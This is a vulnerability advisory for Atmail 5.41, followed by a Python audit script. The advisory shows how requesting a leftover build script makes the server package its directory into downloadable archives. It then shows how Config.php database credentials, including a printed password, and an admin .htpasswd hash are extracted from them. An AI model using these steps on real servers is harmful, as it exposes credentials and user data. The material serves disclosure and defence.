@Mail PHP Version 5.41 patch Release
http://atmail.com/demo/atmailphpdemo.tgz
The default install of Atmail 5.41 creates the following
file in the atmail/ directory: build-plesk-upgrade.php.
If that file is requested over HTTP, for example http://example.com/atmail/build-plesk-upgrade.php,
it will execute on the local server as expected:
nobody 19495 11.3 0.0 22572 8908 ? S 17:25 0:00 /usr/bin/php /usr/local/apache/htdocs/atmail/build-plesk-upgrade.php
producing numerous warnings and errors:
building @Mail-Plesk Pro upgrade
Warning: mkdir() [function.mkdir]: Permission denied in /usr/local/apache/htdocs/atmail/build-plesk-upgrade.php on line 32
making . dir… making /usr/local/atmail-plesk-upgrade/.
and when complete the following files will exist:
/usr/local/apache/htdocs/atmail:
-rw-r--r-- 1 nobody nobody 101754880 Jul 30 17:26 files.tar
-rw-r--r-- 1 nobody nobody 27162656 Jul 30 17:26 plesk-atmail-upgrade.tgz
Both files hold the contents of the atmail/ directory; plesk-atmail-upgrade.tgz
contains only the files.tar file.
Either file could then be downloaded:
http://example.com/atmail/files.tar
http://example.com/atmail/plesk-atmail-upgrade.tgz
or copied to another directory on the server for browsing through. The information
contained in those files includes the Atmail Config.php file which stores the Atmail
database username, password, and database server hostname in plain text:
$ egrep 'sql_(user|host|pass)' libs/Atmail/Config.php
'sql_host' => 'localhost',
'sql_pass' => '43s2H4N55X',
'sql_user' => 'atmail',
This information could then be used to access the Atmail database to obtain client credentials,
such as email addresses, usernames, passwords, session IDs, and more.
Also in the files.tar file is the webadmin/.htpasswd file, which contains the administrator
user's username and password hash.
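
An added example, not part of the original advisory or of Atmail's code: a Python check an administrator could run against an atmail/ directory to see whether the build script or the archives it produces are present, and whether an archive holds Config.php or .htpasswd. The file names come from the advisory; matching tar members by path suffix and the constructed sample tree are assumptions.

```python
import os
import tarfile
import tempfile

# Names from the advisory. The member layout inside files.tar is an assumption,
# so sensitive members are matched by path suffix. "files.tar" is listed because
# plesk-atmail-upgrade.tgz wraps that archive.
BUILD_SCRIPT = "build-plesk-upgrade.php"
ARCHIVES = ("files.tar", "plesk-atmail-upgrade.tgz")
SENSITIVE_SUFFIXES = ("libs/Atmail/Config.php", "webadmin/.htpasswd", "files.tar")

def sensitive_members(archive_path):
    """Return members of a tar archive whose path ends in a sensitive suffix."""
    try:
        with tarfile.open(archive_path) as tar:  # compression is auto-detected
            names = tar.getnames()
    except (tarfile.TarError, OSError):
        return []  # unreadable or not a tar archive
    return sorted(n for n in names if n.endswith(SENSITIVE_SUFFIXES))

def audit_atmail_dir(atmail_dir):
    """Report whether the build script and its output archives are present."""
    script = os.path.join(atmail_dir, BUILD_SCRIPT)
    report = {"build_script_present": os.path.isfile(script), "archives": {}}
    for name in ARCHIVES:
        path = os.path.join(atmail_dir, name)
        if os.path.isfile(path):
            report["archives"][name] = {
                "size": os.path.getsize(path),
                "sensitive": sensitive_members(path),
            }
    return report

def build_sample_install(root):
    """Constructed sample: a fake atmail/ tree with a leftover files.tar."""
    os.makedirs(os.path.join(root, "libs", "Atmail"))
    os.makedirs(os.path.join(root, "webadmin"))
    for rel in (BUILD_SCRIPT, "libs/Atmail/Config.php", "webadmin/.htpasswd"):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("placeholder\n")
    with tarfile.open(os.path.join(root, "files.tar"), "w") as tar:
        tar.add(os.path.join(root, "libs"), arcname="libs")
        tar.add(os.path.join(root, "webadmin"), arcname="webadmin")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print(audit_atmail_dir(build_sample_install(tmp)))
```

Any archive reported under a web-served directory should be treated as downloadable, and the credentials it contains as exposed.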